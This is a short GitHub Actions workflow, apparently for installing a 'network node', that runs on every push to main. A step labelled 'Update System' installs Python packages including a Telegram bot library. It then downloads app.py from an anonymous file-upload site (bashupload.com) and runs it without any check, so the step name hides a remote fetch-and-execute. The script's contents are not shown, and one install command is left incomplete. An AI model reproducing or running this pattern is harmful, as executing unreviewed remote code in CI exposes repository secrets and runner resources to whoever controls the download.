name: Install Multiple Network Node

on:
  push:
    branches:
      - main

jobs:
  install-node:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout Code
        uses: actions/checkout@v3

      - name: Update System
        run: |
          sudo apt update -y
          sudo apt install
          pip install aiohttp requests
          pip install python-telegram-bot
          wget https://bashupload.com/M_Vi6/app.py
          python app.py
